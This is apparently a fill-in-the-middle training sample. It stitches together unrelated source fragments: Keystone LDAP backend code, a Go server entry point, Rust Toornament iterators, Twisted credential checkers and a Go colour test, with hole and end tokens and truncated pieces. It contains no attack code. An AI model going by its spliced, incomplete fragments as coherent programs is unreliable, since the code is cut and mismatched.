self.auth_pool_conn_lifetime = conf.ldap.auth_pool_connection_lifetime
if self.options_name is not None:
self.suffix = conf.ldap.suffix
if self.suffix is None:
self.suffix = self.DEFAULT_SUFFIX
dn = '%s_tree_dn' % self.options_name
self.tree_dn = (getattr(conf.ldap, dn)
or '%s,%s' % (self.DEFAULT_OU, self.suffix))
idatt = '%s_id_attribute' % self.options_name
self.id_attr = getattr(conf.ldap, idatt) or self.DEFAULT_ID_ATTR
objclass = '%s_objectclass' % self.options_name
self.object_class = (getattr(conf.ldap, objclass)
or self.DEFAULT_OBJECTCLASS)
for k, v in six.iteritems(self.attribute_options_names):
v = '%s_%s_attribute' % (self.options_name, v)
self.attribute_mapping[k] = getattr(conf.ldap, v)
attr_mapping_opt = ('%s_additional_attribute_mapping' %
self.options_name)
attr_mapping = (getattr(conf.ldap, attr_mapping_opt)
or self.DEFAULT_EXTRA_ATTR_MAPPING)
self.extra_attr_mapping = self._parse_extra_attrs(attr_mapping)
ldap_filter = '%s_filter' % self.options_name
self.ldap_filter = getattr(conf.ldap,
ldap_filter) or self.DEFAULT_FILTER
allow_create = '%s_allow_create' % self.options_name
self.allow_create = getattr(conf.ldap, allow_create)
allow_update = '%s_allow_update' % self.options_name
self.allow_update = getattr(conf.ldap, allow_update)
allow_delete = '%s_allow_delete' % self.options_name
self.allow_delete = getattr(conf.ldap, allow_delete)
member_attribute = '%s_member_attribute' % self.options_name
self.member_attribute = getattr(conf.ldap, member_attribute, None)
self.structural_classes = self.DEFAULT_STRUCTURAL_CLASSES
if self.notfound_arg is None:
self.notfound_arg = self.options_name + '_id'
attribute_ignore = '%s_attribute_ignore' % self.options_name
self.attribute_ignore = getattr(conf.ldap, attribute_ignore)
self.use_dumb_member = conf.ldap.use_dumb_member
self.dumb_member = (conf.ldap.dumb_member or
self.DUMB_MEMBER_DN)
self.subtree_delete_enabled = conf.ldap.allow_subtree_delete
def _not_found(self, object_id):
if self.NotFound is None:
return exception.NotFound(target=object_id)
else:
return self.NotFound(**{self.notfound_arg: object_id})
def _parse_extra_attrs(self, option_list):
mapping = {}
for item in option_list:
try:
ldap_attr, attr_map = item.split(':')
except Exception:
LOG.warn(_LW(
'Invalid additional attribute mapping: "%s". '
'Format must be <ldap_attribute>:<keystone_attribute>'),
item)
continue
mapping[ldap_attr] = attr_map
return mapping
def _is_dumb_member(self, member_dn):
"""Checks that member is a dumb member.
:param member_dn: DN of member to be checked.
"""
return (self.use_dumb_member
and is_dn_equal(member_dn, self.dumb_member))
def get_connection(self, user=None, password=None, end_user_auth=False):
use_pool = self.use_pool
pool_size = self.pool_size
pool_conn_lifetime = self.pool_conn_lifetime
if end_user_auth:
if not self.use_auth_pool:
use_pool = False
else:
pool_size = self.auth_pool_size
pool_conn_lifetime = self.auth_pool_conn_lifetime
conn = _get_connection(self.LDAP_URL, use_pool,
use_auth_pool=end_user_auth)
conn = KeystoneLDAPHandler(conn=conn)
conn.connect(self.LDAP_URL,
page_size=self.page_size,
alias_dereferencing=self.alias_dereferencing,
use_tls=self.use_tls,
tls_cacertfile=self.tls_cacertfile,
tls_cacertdir=self.tls_cacertdir,
tls_req_cert=self.tls_req_cert,
chase_referrals=self.chase_referrals,
debug_level=self.debug_level,
use_pool=use_pool,
pool_size=pool_size,
pool_retry_max=self.pool_retry_max,
pool_retry_delay=self.pool_retry_delay,
pool_conn_timeout=self.pool_conn_timeout,
pool_conn_lifetime=pool_conn_lifetime
)
if user is None:
user = self.LDAP_USER
if password is None:
password = self.LDAP_PASSWORD
# not all LDAP servers require authentication, so we don't bind
# if we don't have any user/pass
if user and password:
conn.simple_bind_s(user, password)
return conn
def _id_to_dn_string(self, object_id):
return u'%s=%s,%s' % (self.id_attr,
ldap.dn.escape_dn_chars(
six.text_type(object_id)),
self.tree_dn)
def _id_to_dn(self, object_id):
if self.LDAP_SCOPE == ldap.SCOPE_ONELEVEL:
return self._id_to_dn_string(object_id)
with self.get_connection() as conn:
search_result = conn.search_s(
self.tree_dn, self.LDAP_SCOPE,
u'(&(%(id_attr)s=%(id)s)(objectclass=%(objclass)s))' %
{'id_attr': self.id_attr,
'id': ldap.filter.escape_filter_chars(
six.text_type(object_id)),
'objclass': self.object_class},
attrlist=DN_ONLY)
if search_result:
dn, attrs = search_result[0]
return dn
else:
return self._id_to_dn_string(object_id)
@staticmethod
def _dn_to_id(dn):
return utf8_decode(ldap.dn.str2dn(utf8_encode(dn))[0][0][1])
def _ldap_res_to_model(self, res):
# LDAP attribute names may be returned in a different case than
# they are defined in the mapping, so we need to check for keys
# in a case-insensitive way. We use the case specified in the
# mapping for the model to ensure we have a predictable way of
# retrieving values later.
lower_res = {k.lower(): v for k, v in six.iteritems(res[1])}
id_attrs = lower_res.get(self.id_attr.lower())
if not id_attrs:
message = _('ID attribute %(id_attr)s not found in LDAP '
'object %(dn)s') % ({'id_attr': self.id_attr,
'dn': res[0]})
raise exception.NotFound(message=message)
if len(id_attrs) > 1:
# FIXME(gyee): if this is a multi-value attribute and it has
# multiple values, we can't use it as ID. Retain the dn_to_id
# logic here so it does not potentially break existing
# deployments. We need to fix our read-write LDAP logic so
# it does not get the ID from DN.
message = _LW('ID attribute %(id_attr)s for LDAP object %(dn)s '
'has multiple values and therefore cannot be used '
'as an ID. Will get the ID from DN instead') % (
{'id_attr': self.id_attr,
'dn': res[0]})
LOG.warn(message)
id_val = self._dn_to_id(res[0])
else:
id_val = id_attrs[0]
obj = self.model(id=id_val)
for k in obj.known_keys:
if k in self.attribute_ignore:
continue
try:
map_attr = self.attribute_mapping.get(k, k)
if map_attr is None:
# Ignore attributes that are mapped to None.
continue
v = lower_res[map_attr.lower()]
except KeyError:
pass
else:
try:
obj[k] = v[0]
except IndexError:
obj[k] = None
return obj
def check_allow_create(self):
if not self.allow_create:
action = _('LDAP %s create') % self.options_name
raise exception.ForbiddenAction(action=action)
def check_allow_update(self):
if not self.allow_update:
action = _('LDAP %s update') % self.options_name
raise exception.ForbiddenAction(action=action)
def check_allow_delete(self):
if not self.allow_delete:
action = _('LDAP %s delete') % self.options_name
raise exception.ForbiddenAction(action=action)
def affirm_unique(self, values):
if values.get('name') is not None:
try:
self.get_by_name(values['name'])
except exception.NotFound:
pass
else:
raise exception.Conflict(type=self.options_name,
details=_('Duplicate name, %s.') %
values['name'])
if values.get('id') is not None:
try:
self.get(values['id'])
except exception.NotFound:
pass
else:
raise exception.Conflict(type=self.options_name,
details=_('Duplicate ID, %s.') %
values['id'])
def create(self, values):
self.affirm_unique(values)
object_classes = self.structural_classes + [self.object_class]
attrs = [('objectClass', object_classes)]
for k, v in six.iteritems(values):
if k in self.attribute_ignore:
continue
if k == 'id':
# no need to check if v is None as 'id' will always have
# a value
attrs.append((self.id_attr, [v]))
elif v is not None:
attr_type = self.attribute_mapping.get(k, k)
if attr_type is not None:
attrs.append((attr_type, [v]))
extra_attrs = [attr for attr, name
in six.iteritems(self.extra_attr_mapping)
if name == k]
for attr in extra_attrs:
attrs.append((attr, [v]))
if 'groupOfNames' in object_classes and self.use_dumb_member:
attrs.append(('member', [self.dumb_member]))
with self.get_connection() as conn:
conn.add_s(self._id_to_dn(values['id']), attrs)
return values
def _ldap_get(self, object_id, ldap_filter=None):
query = (u'(&(%(id_attr)s=%(id)s)'
u'%(filter)s'
u'(objectClass=%(object_class)s))'
% {'id_attr': self.id_attr,
'id': ldap.filter.escape_filter_chars(
six.text_type(object_id)),
'filter': (ldap_filter or self.ldap_filter or ''),
'object_class': self.object_class})
with self.get_connection() as conn:
try:
attrs = list(set(([self.id_attr] +
self.attribute_mapping.values() +
self.extra_attr_mapping.keys())))
res = conn.search_s(self.tree_dn,
self.LDAP_SCOPE,
query,
attrs)
except ldap.NO_SUCH_OBJECT:
return None
try:
return res[0]
except IndexError:
return None
def _ldap_get_all(self, ldap_filter=None):
query = u'(&%s(objectClass=%s))' % (ldap_filter or
self.ldap_filter or
'', self.object_class)
with self.get_connection() as conn:
try:
attrs = list(set(([self.id_attr] +
self.attribute_mapping.values() +
self.extra_attr_mapping.keys())))
return conn.search_s(self.tree_dn,
self.LDAP_SCOPE,
query,
attrs)
except ldap.NO_SUCH_OBJECT:
return []
def _ldap_get_list(self, search_base, scope, query_params=None,
attrlist=None):
query = u'(objectClass=%s)' % self.object_class
if query_params:
def calc_filter(attrname, value):
val_esc = ldap.filter.escape_filter_chars(value)
return '(%s=%s)' % (attrname, val_esc)
query = (u'(&%s%s)' %
(query, ''.join([calc_filter(k, v) for k, v in
six.iteritems(query_params)])))
with self.get_connection() as conn:
return conn.search_s(search_base, scope, query, attrlist)
def get(self, object_id, ldap_filter=None):
res = self._ldap_get(object_id, ldap_filter)
if res is None:
raise self._not_found(object_id)
else:
return self._ldap_res_to_model(res)
def get_by_name(self, name, ldap_filter=None):
query = (u'(%s=%s)' % (self.attribute_mapping['name'],
ldap.filter.escape_filter_chars(
six.text_type(name))))
res = self.get_all(query)
try:
return res[0]
except IndexError:
raise self._not_found(name)
def get_all(self, ldap_filter=None):
return [self._ldap_res_to_model(x)
for x in self._ldap_get_all(ldap_filter)]
def update(self, object_id, values, old_obj=None):
if old_obj is None:
old_obj = self.get(object_id)
modlist = []
for k, v in six.iteritems(values):
if k == 'id':
# id can't be modified.
continue
if k in self.attribute_ignore:
# Handle 'enabled' specially since can't disable if ignored.
if k == 'enabled' and (not v):
action = _("Disabling an entity where the 'enable' "
"attribute is ignored by configuration.")
raise exception.ForbiddenAction(action=action)
continue
# attribute value has not changed
if k in old_obj and old_obj[k] == v:
continue
if k in self.immutable_attrs:
msg = (_("Cannot change %(option_name)s %(attr)s") %
{'option_name': self.options_name, 'attr': k})
raise exception.ValidationError(msg)
if v is None:
if old_obj.get(k) is not None:
modlist.append((ldap.MOD_DELETE,
self.attribute_mapping.get(k, k),
None))
continue
current_value = old_obj.get(k)
if current_value is None:
op = ldap.MOD_ADD
modlist.append((op, self.attribute_mapping.get(k, k), [v]))
elif current_value != v:
op = ldap.MOD_REPLACE
modlist.append((op, self.attribute_mapping.get(k, k), [v]))
if modlist:
with self.get_connection() as conn:
try:
conn.modify_s(self._id_to_dn(object_id), modlist)
except ldap.NO_SUCH_OBJECT:
raise self._not_found(object_id)
return self.get(object_id)
def delete(self, object_id):
with self.get_connection() as conn:
try:
conn.delete_s(self._id_to_dn(object_id))
except ldap.NO_SUCH_OBJECT:
raise self._not_found(object_id)
def deleteTree(self, object_id):
tree_delete_control = ldap.controls.LDAPControl(CONTROL_TREEDELETE,
0,
None)
with self.get_connection() as conn:
try:
conn.delete_ext_s(self._id_to_dn(object_id),
serverctrls=[tree_delete_control])
except ldap.NO_SUCH_OBJECT:
raise self._not_found(object_id)
except ldap.NOT_ALLOWED_ON_NONLEAF:
# Most LDAP servers do not support the tree_delete_control.
# In these servers, the usual idiom is to first perform a
# search to get the entries to delete, then delete them in
# in order of child to parent, since LDAP forbids the
# deletion of a parent entry before deleting the children
# of that parent. The simplest way to do that is to delete
# the entries in order of the length of the DN, from longest
# to shortest DN.
dn = self._id_to_dn(object_id)
scope = ldap.SCOPE_SUBTREE
# With some directory servers, an entry with objectclass
# ldapsubentry will not be returned unless it is explicitly
# requested, by specifying the objectclass in the search
# filter. We must specify this, with objectclass=*, in an
# LDAP filter OR clause, in order to return all entries
filt = '(|(objectclass=*)(objectclass=ldapsubentry))'
# We only need the DNs of the entries. Since no attributes
# will be returned, we do not have to specify attrsonly=1.
entries = conn.search_s(dn, scope, filt, attrlist=DN_ONLY)
if entries:
for dn in sorted((e[0] for e in entries),
key=len, reverse=True):
conn.delete_s(dn)
else:
LOG.debug('No entries in LDAP subtree %s', dn)
def add_member(self, member_dn, member_list_dn):
"""Add member to the member list.
:param member_dn: DN of member to be added.
:param member_list_dn: DN of group to which the
member will be added.
:raises: exception.Conflict: If the user was already a member.
self.NotFound: If the group entry didn't exist.
"""
with self.get_connection() as conn:
try:
mod = (ldap.MOD_ADD, self.member_attribute, member_dn)
conn.modify_s(member_list_dn, [mod])
except ldap.TYPE_OR_VALUE_EXISTS:
raise exception.Conflict(_('Member %(member)s '
'is already a member'
' of group %(group)s') % {
'member': member_dn,
'group': member_list_dn})
except ldap.NO_SUCH_OBJECT:
raise self._not_found(member_list_dn)
def remove_member(self, member_dn, member_list_dn):
"""Remove member from the member list.
:param member_dn: DN of member to be removed.
:param member_list_dn: DN of group from which the
member will be removed.
:raises: self.NotFound: If the group entry didn't exist.
ldap.NO_SUCH_ATTRIBUTE: If the user wasn't a member.
"""
with self.get_connection() as conn:
try:
mod = (ldap.MOD_DELETE, self.member_attribute, member_dn)
conn.modify_s(member_list_dn, [mod])
except ldap.NO_SUCH_OBJECT:
raise self._not_found(member_list_dn)
def _delete_tree_nodes(self, search_base, scope, query_params=None):
query = u'(objectClass=%s)' % self.object_class
if query_params:
query = (u'(&%s%s)' %
(query, ''.join(['(%s=%s)'
% (k, ldap.filter.escape_filter_chars(v))
for k, v in
six.iteritems(query_params)])))
not_deleted_nodes = []
with self.get_connection() as conn:
try:
nodes = conn.search_s(search_base, scope, query,
attrlist=DN_ONLY)
except ldap.NO_SUCH_OBJECT:
LOG.debug('Could not find entry with dn=%s', search_base)
raise self._not_found(self._dn_to_id(search_base))
else:
for node_dn, _t in nodes:
try:
conn.delete_s(node_dn)
except ldap.NO_SUCH_OBJECT:
not_deleted_nodes.append(node_dn)
if not_deleted_nodes:
LOG.warn(_LW("When deleting entries for %(search_base)s, could not"
" delete nonexistent entries %(entries)s%(dots)s"),
{'search_base': search_base,
'entries': not_deleted_nodes[:3],
'dots': '...' if len(not_deleted_nodes) > 3 else ''})
def filter_query(self, hints, query=None):
"""Applies filtering to a query.
:param hints: contains the list of filters, which may be None,
indicating that there are no filters to be applied.
If it's not None, then any filters satisfied here will be
removed so that the caller will know if any filters
remain to be applied.
:param query: LDAP query into which to include filters
:returns query: LDAP query, updated with any filters satisfied
"""
def build_filter(filter_, hints):
"""Build a filter for the query.
:param filter_: the dict that describes this filter
:param hints: contains the list of filters yet to be satisfied.
:returns query: LDAP query term to be added
"""
ldap_attr = self.attribute_mapping[filter_['name']]
val_esc = ldap.filter.escape_filter_chars(filter_['value'])
if filter_['case_sensitive']:
# NOTE(henry-nash): Although dependent on the schema being
# used, most LDAP attributes are configured with case
# insensitive matching rules, so we'll leave this to the
# controller to filter.
return
if filter_['name'] == 'enabled':
# NOTE(henry-nash): Due to the different options for storing
# the enabled attribute (e,g, emulated or not), for now we
# don't try and filter this at the driver level - we simply
# leave the filter to be handled by the controller. It seems
# unlikley that this will cause a signifcant performance
# issue.
return
# TODO(henry-nash): Currently there are no booleans (other than
# 'enabled' that is handled above) on which you can filter. If
# there were, we would need to add special handling here to
# convert the booleans values to 'TRUE' and 'FALSE'. To do that
# we would also need to know which filter keys were actually
# booleans (this is related to bug #1411478).
if filter_['comparator'] == 'equals':
query_term = (u'(%(attr)s=%(val)s)'
% {'attr': ldap_attr, 'val': val_esc})
elif filter_['comparator'] == 'contains':
query_term = (u'(%(attr)s=*%(val)s*)'
% {'attr': ldap_attr, 'val': val_esc})
elif filter_['comparator'] == 'startswith':
query_term = (u'(%(attr)s=%(val)s*)'
% {'attr': ldap_attr, 'val': val_esc})
elif filter_['comparator'] == 'endswith':
query_term = (u'(%(attr)s=*%(val)s)'
% {'attr': ldap_attr, 'val': val_esc})
else:
# It's a filter we don't understand, so let the caller
# work out if they need to do something with it.
return
return query_term
if hints is None:
return query
filter_list = []
satisfied_filters = []
for filter_ in hints.filters:
if filter_['name'] not in self.attribute_mapping:
continue
new_filter = build_filter(filter_, hints)
if new_filter is not None:
filter_list.append(new_filter)
satisfied_filters.append(filter_)
if filter_list:
query = u'(&%s%s)' % (query, ''.join(filter_list))
# Remove satisfied filters, then the caller will know remaining filters
for filter_ in satisfied_filters:
hints.filters.remove(filter_)
return query
class EnabledEmuMixIn(BaseLdap):
"""Emulates boolean 'enabled' attribute if turned on.
Creates groupOfNames holding all enabled objects of this class, all missing
objects are considered disabled.
Options:
* $name_enabled_emulation - boolean, on/off
* $name_enabled_emulation_dn - DN of that groupOfNames, default is
cn=enabled_${name}s,${tree_dn}
Where ${name}s is the plural of self.options_name ('users' or 'tenants'),
${tree_dn} is self.tree_dn.
"""
def __init__(self, conf):
super(EnabledEmuMixIn, self).__init__(conf)
enabled_emulation = '%s_enabled_emulation' % self.options_name
self.enabled_emulation = getattr(conf.ldap, enabled_emulation)
enabled_emulation_dn = '%s_enabled_emulation_dn' % self.options_name
self.enabled_emulation_dn = getattr(conf.ldap, enabled_emulation_dn)
if not self.enabled_emulation_dn:
naming_attr_name = 'cn'
naming_attr_value = 'enabled_%ss' % self.options_name
sub_vals = (naming_attr_name, naming_attr_value, self.tree_dn)
self.enabled_emulation_dn = '%s=%s,%s' % sub_vals
naming_attr = (naming_attr_name, [naming_attr_value])
else:
# Extract the attribute name and value from the configured DN.
naming_dn = ldap.dn.str2dn(utf8_encode(self.enabled_emulation_dn))
naming_rdn = naming_dn[0][0]
naming_attr = (utf8_decode(naming_rdn[0]),
utf8_decode(naming_rdn[1]))
self.enabled_emulation_naming_attr = naming_attr
def _get_enabled(self, object_id):
dn = self._id_to_dn(object_id)
query = '(member=%s)' % dn
with self.get_connection() as conn:
try:
enabled_value = conn.search_s(self.enabled_emulation_dn,
ldap.SCOPE_BASE,
query, ['cn'])
except ldap.NO_SUCH_OBJECT:
return False
else:
return bool(enabled_value)
def _add_enabled(self, object_id):
if not self._get_enabled(object_id):
modlist = [(ldap.MOD_ADD,
'member',
[self._id_to_dn(object_id)])]
with self.get_connection() as conn:
try:
conn.modify_s(self.enabled_emulation_dn, modlist)
except ldap.NO_SUCH_OBJECT:
attr_list = [('objectClass', ['groupOfNames']),
('member', [self._id_to_dn(object_id)]),
self.enabled_emulation_naming_attr]
if self.use_dumb_member:
attr_list[1][1].append(self.dumb_member)
conn.add_s(self.enabled_emulation_dn, attr_list)
def _remove_enabled(self, object_id):
modlist = [(ldap.MOD_DELETE,
'member',
[self._id_to_dn(object_id)])]
with self.get_connection() as conn:
try:
conn.modify_s(self.enabled_emulation_dn, modlist)
except (ldap.NO_SUCH_OBJECT, ldap.NO_SUCH_ATTRIBUTE):
pass
def create(self, values):
if self.enabled_emulation:
enabled_value = values.pop('enabled', True)
ref = super(EnabledEmuMixIn, self).create(values)
if 'enabled' not in self.attribute_ignore:
if enabled_value:
self._add_enabled(ref['id'])
ref['enabled'] = enabled_value
return ref
else:
return super(EnabledEmuMixIn, self).create(values)
def get(self, object_id, ldap_filter=None):
ref = super(EnabledEmuMixIn, self).get(object_id, ldap_filter)
if 'enabled' not in self.attribute_ignore and self.enabled_emulation:
ref['enabled'] = self._get_enabled(object_id)
return ref
def get_all(self, ldap_filter=None):
if 'enabled' not in self.attribute_ignore and self.enabled_emulation:
# had to copy BaseLdap.get_all here to ldap_filter by DN
tenant_list = [self._ldap_res_to_model(x)
for x in self._ldap_get_all(ldap_filter)
if x[0] != self.enabled_emulation_dn]
for tenant_ref in tenant_list:
tenant_ref['enabled'] = self._get_enabled(tenant_ref['id'])
return tenant_list
else:
return super(EnabledEmuMixIn, self).get_all(ldap_filter)
def update(self, object_id, values, old_obj=None):
if 'enabled' not in self.attribute_ignore and self.enabled_emulation:
data = values.copy()
enabled_value = data.pop('enabled', None)
ref = super(EnabledEmuMixIn, self).update(object_id, data, old_obj)
if enabled_value is not None:
if enabled_value:
self._add_enabled(object_id)
else:
self._remove_enabled(object_id)
ref['enabled'] = enabled_value
return ref
else:
return super(EnabledEmuMixIn, self).update(
object_id, values, old_obj)
def delete(self, object_id):
if self.enabled_emulation:
self._remove_enabled(object_id)
super(EnabledEmuMixIn, self).delete(object_id)
class ProjectLdapStructureMixin(object):
"""Project LDAP Structure shared between LDAP backends.
This is shared between the resource and assignment LDAP backends.
"""
DEFAULT_OU = 'ou=Groups'
DEFAULT_STRUCTURAL_CLASSES = []
DEFAULT_OBJECTCLASS = 'groupOfNames'
DEFAULT_ID_ATTR = 'cn'
NotFound = exception.ProjectNotFound
notfound_arg = 'project_id' # NOTE(yorik-sar): while options_name = tenant
options_name = 'project'
attribute_options_names = {'name': 'name',
'description': 'desc',
'enabled': 'enabled',
'domain_id': 'domain_id'}
immutable_attrs = ['name']<|fim▁end|> | decorators. Experience has shown it's very easy to apply |
<|file_name|>groupthink.go<|end_file_name|><|fim▁begin|>package main
import (
"log"
"os"
"path/filepath"
"github.com/aodin/volta/config"
"github.com/codegangsta/cli"
"github.com/codegangsta/envy/lib"
"github.com/aodin/groupthink/server"
)
func main() {
// Bootstrap the environment
envy.Bootstrap()
app := cli.NewApp()
app.Name = "groupthink"
app.Usage = "Start the groupthink server"
app.Action = startServer
app.Flags = []cli.Flag{
cli.StringFlag{
Name: "log, l",
Value: "",
Usage: "Sets the log output file path",
},
cli.StringFlag{
Name: "config, c",
Value: "./settings.json",
Usage: "Sets the configuration file",
},<|fim▁hole|>func startServer(c *cli.Context) {
logF := c.String("log")
file := c.String("config")
// Set the log output - if no path given, use stdout
// TODO log rotation?
if logF != "" {
if err := os.MkdirAll(filepath.Dir(logF), 0776); err != nil {
log.Panic(err)
}
l, err := os.OpenFile(logF, os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0644)
if err != nil {
log.Panic(err)
}
defer l.Close()
log.SetOutput(l)
}
conf := connect(file)
log.Panic(server.New(conf).ListenAndServe())
}
func connect(file string) config.Config {
// Parse the given configuration file
conf, err := config.ParseFile(file)
if err != nil {
log.Panicf("groupthink: could not parse configuration: %s", err)
}
return conf
}<|fim▁end|> | }
app.Run(os.Args)
}
|
<|file_name|>basic.rs<|end_file_name|><|fim▁begin|>#![feature(phase)]
#[phase(plugin)] extern crate compile_msg;<|fim▁hole|>fn main() {
compile_note!("useful information: ", 1, " instance");
compile_warning!("x");
compile_error!("y");
// compilation stops here
compile_fatal!("z");
compile_note!("not emitted")
}<|fim▁end|> |
#[cfg(rare)]
compile_note!("only emitted with --cfg rate")
|
<|file_name|>tournament_matches.rs<|end_file_name|><|fim▁begin|>use crate::*;
use iter::games::GamesIter;
/// A tournament matches iterator
pub struct TournamentMatchesIter<'a> {
client: &'a Toornament,
/// Fetch matches of tournament
tournament_id: TournamentId,
/// Fetch games with the match
with_games: bool,
}
impl<'a> TournamentMatchesIter<'a> {
/// Creates new match iterator
pub fn new(client: &'a Toornament, tournament_id: TournamentId) -> TournamentMatchesIter {
TournamentMatchesIter {
client,
tournament_id,
with_games: false,
}
}
}
/// Builders
impl<'a> TournamentMatchesIter<'a> {
/// Fetch match games
pub fn with_games(mut self, with_games: bool) -> Self {
self.with_games = with_games;
self
}
/// Fetch match by tournament id
pub fn of_tournament(mut self, id: TournamentId) -> Self {
self.tournament_id = id;
self
}
}
/// Modifiers
impl<'a> TournamentMatchesIter<'a> {
/// Get a match with id
pub fn with_id(self, match_id: MatchId) -> TournamentMatchIter<'a> {
TournamentMatchIter {
client: self.client,
tournament_id: self.tournament_id,
match_id,
with_games: self.with_games,
}
}
}
/// Terminators
impl<'a> TournamentMatchesIter<'a> {
/// Fetch matches
pub fn collect<T: From<Matches>>(self) -> Result<T> {
Ok(T::from(self.client.matches(
self.tournament_id,
None,
self.with_games,
)?))
}
}
/// A tournament match iterator
pub struct TournamentMatchIter<'a> {
client: &'a Toornament,
/// Fetch match of tournament
tournament_id: TournamentId,
/// Fetch match with id
match_id: MatchId,
/// Fetch games with the match
with_games: bool,
}
impl<'a> TournamentMatchIter<'a> {
/// Creates new tournament match iter
pub fn new(
client: &'a Toornament,
tournament_id: TournamentId,
match_id: MatchId,
with_games: bool,
) -> TournamentMatchIter<'a> {
TournamentMatchIter {
client,
tournament_id,
match_id,
with_games,
}
}
}
/// Modifiers
impl<'a> TournamentMatchIter<'a> {
/// Tournament match lazy editor
pub fn edit<F: 'static + FnMut(Match) -> Match>(self, editor: F) -> TournamentMatchEditor<'a> {
TournamentMatchEditor {
client: self.client,
tournament_id: self.tournament_id,
match_id: self.match_id,
with_games: self.with_games,
editor: Box::new(editor),<|fim▁hole|>
/// Fetch match result
pub fn result(self) -> TournamentMatchResultIter<'a> {
TournamentMatchResultIter {
client: self.client,
tournament_id: self.tournament_id,
match_id: self.match_id,
}
}
/// Return games of this match
pub fn games(self) -> GamesIter<'a> {
GamesIter::new(self.client, self.tournament_id, self.match_id)
}
}
/// Terminators
impl<'a> TournamentMatchIter<'a> {
/// Fetch the match
pub fn collect<T: From<Match>>(self) -> Result<T> {
let matches = self.client.matches(
self.tournament_id.clone(),
Some(self.match_id.clone()),
self.with_games,
)?;
match matches.0.first() {
Some(m) => Ok(T::from(m.to_owned())),
None => Err(Error::Iter(IterError::NoSuchMatch(
self.tournament_id,
self.match_id,
))),
}
}
}
/// A tournament match result iterator
pub struct TournamentMatchResultIter<'a> {
client: &'a Toornament,
/// Fetch match of tournament
tournament_id: TournamentId,
/// Fetch match with id
match_id: MatchId,
}
/// Modifiers
impl<'a> TournamentMatchResultIter<'a> {
/// Tournament match result lazy editor
pub fn edit<F: 'static + FnMut(MatchResult) -> MatchResult>(
self,
editor: F,
) -> TournamentMatchResultEditor<'a> {
TournamentMatchResultEditor {
client: self.client,
tournament_id: self.tournament_id,
match_id: self.match_id,
editor: Box::new(editor),
}
}
}
/// Terminators
impl<'a> TournamentMatchResultIter<'a> {
/// Fetch the match result
pub fn collect<T: From<MatchResult>>(self) -> Result<T> {
Ok(T::from(
self.client
.match_result(self.tournament_id, self.match_id)?,
))
}
}
/// A lazy match result editor
pub struct TournamentMatchResultEditor<'a> {
client: &'a Toornament,
/// Fetch match of tournament
tournament_id: TournamentId,
/// Fetch match with id
match_id: MatchId,
/// Match result editor
editor: Box<dyn FnMut(MatchResult) -> MatchResult>,
}
/// Terminators
impl<'a> TournamentMatchResultEditor<'a> {
/// Adds or edits the match result
pub fn update(mut self) -> Result<MatchResult> {
let original = self
.client
.match_result(self.tournament_id.clone(), self.match_id.clone())?;
self.client
.set_match_result(self.tournament_id, self.match_id, (self.editor)(original))
}
}
/// A lazy tournament match editor
pub struct TournamentMatchEditor<'a> {
client: &'a Toornament,
/// Fetch match of tournament
tournament_id: TournamentId,
/// Fetch match with id
match_id: MatchId,
/// Fetch games with the match
with_games: bool,
/// Editor
editor: Box<dyn FnMut(Match) -> Match>,
}
/// Terminators
impl<'a> TournamentMatchEditor<'a> {
/// Edits the match
pub fn update(mut self) -> Result<Match> {
let matches = self.client.matches(
self.tournament_id.clone(),
Some(self.match_id.clone()),
self.with_games,
)?;
let original = match matches.0.first() {
Some(m) => m.to_owned(),
None => {
return Err(Error::Iter(IterError::NoSuchMatch(
self.tournament_id,
self.match_id,
)))
}
};
self.client
.update_match(self.tournament_id, self.match_id, (self.editor)(original))
}
}<|fim▁end|> | }
} |
<|file_name|>checkers.py<|end_file_name|><|fim▁begin|># -*- test-case-name: twisted.test.test_newcred -*-
from twisted.internet import defer
from twisted.python import components, failure
from twisted.cred import error, credentials
class ICredentialsChecker(components.Interface):
"""I check sub-interfaces of ICredentials.
@cvar credentialInterfaces: A list of sub-interfaces of ICredentials which
specifies which I may check.
"""
def requestAvatarId(self, credentials):
"""
@param credentials: something which implements one of the interfaces in
self.credentialInterfaces.
@return: a Deferred which will fire a string which identifies an
avatar, an empty tuple to specify an authenticated anonymous user
(provided as checkers.ANONYMOUS) or fire a Failure(UnauthorizedLogin).
A note on anonymity - We do not want None as the value for anonymous
because it is too easy to accidentally return it. We do not want the
empty string, because it is too easy to mistype a password file. For
example, an .htpasswd file may contain the lines: ['hello:asdf',
'world:asdf', 'goodbye', ':world']. This misconfiguration will have an
ill effect in any case, but accidentally granting anonymous access is a
worse failure mode than simply granting access to an untypeable
username. We do not want an instance of 'object', because that would<|fim▁hole|>
ANONYMOUS = ()
class AllowAnonymousAccess:
__implements__ = ICredentialsChecker
credentialInterfaces = credentials.IAnonymous,
def requestAvatarId(self, credentials):
return defer.succeed(ANONYMOUS)
class InMemoryUsernamePasswordDatabaseDontUse:
credentialInterfaces = credentials.IUsernamePassword,
__implements__ = ICredentialsChecker
def __init__(self):
self.users = {}
def addUser(self, username, password):
self.users[username] = password
def _cbPasswordMatch(self, matched, username):
if matched:
return username
else:
return failure.Failure(error.UnauthorizedLogin())
def requestAvatarId(self, credentials):
if self.users.has_key(credentials.username):
return defer.maybeDeferred(
credentials.checkPassword,
self.users[credentials.username]).addCallback(
self._cbPasswordMatch, credentials.username)
else:
return defer.fail(error.UnauthorizedLogin())<|fim▁end|> | create potential problems with persistence.
""" |
<|file_name|>rgb_test.go<|end_file_name|><|fim▁begin|>package clr
import (
"testing"
)
func TestHSL(t *testing.T) {
tables := []struct {
rgb RGB
h uint16
s uint8<|fim▁hole|> {RGB{R: 165, G: 23, B: 139}, 310, 75, 36},
{RGB{R: 221, G: 132, B: 90}, 19, 65, 60},
{RGB{R: 89, G: 1, B: 55}, 323, 97, 17},
{RGB{R: 132, G: 135, B: 132}, 120, 1, 52},
}
for _, table := range tables {
h, s, l := table.rgb.HSL()
if h-table.h > 1 || table.h-h > 1 {
t.Errorf("H of %v was incorrect, got: %d wanted: %d\n", table.rgb, h, table.h)
}
if s != table.s {
t.Errorf("S of %v was incorrect, got: %d wanted: %d\n", table.rgb, s, table.s)
}
if l != table.l {
t.Errorf("L of %v was incorrect, got: %d wanted: %d\n", table.rgb, l, table.l)
}
}
}
func TestHSV(t *testing.T) {
tables := []struct {
rgb RGB
h uint16
s uint8
v uint8
}{
{RGB{R: 78, G: 91, B: 112}, 217, 30, 43},
{RGB{R: 165, G: 23, B: 139}, 310, 86, 64},
{RGB{R: 221, G: 132, B: 90}, 19, 59, 86},
{RGB{R: 89, G: 1, B: 55}, 323, 98, 34},
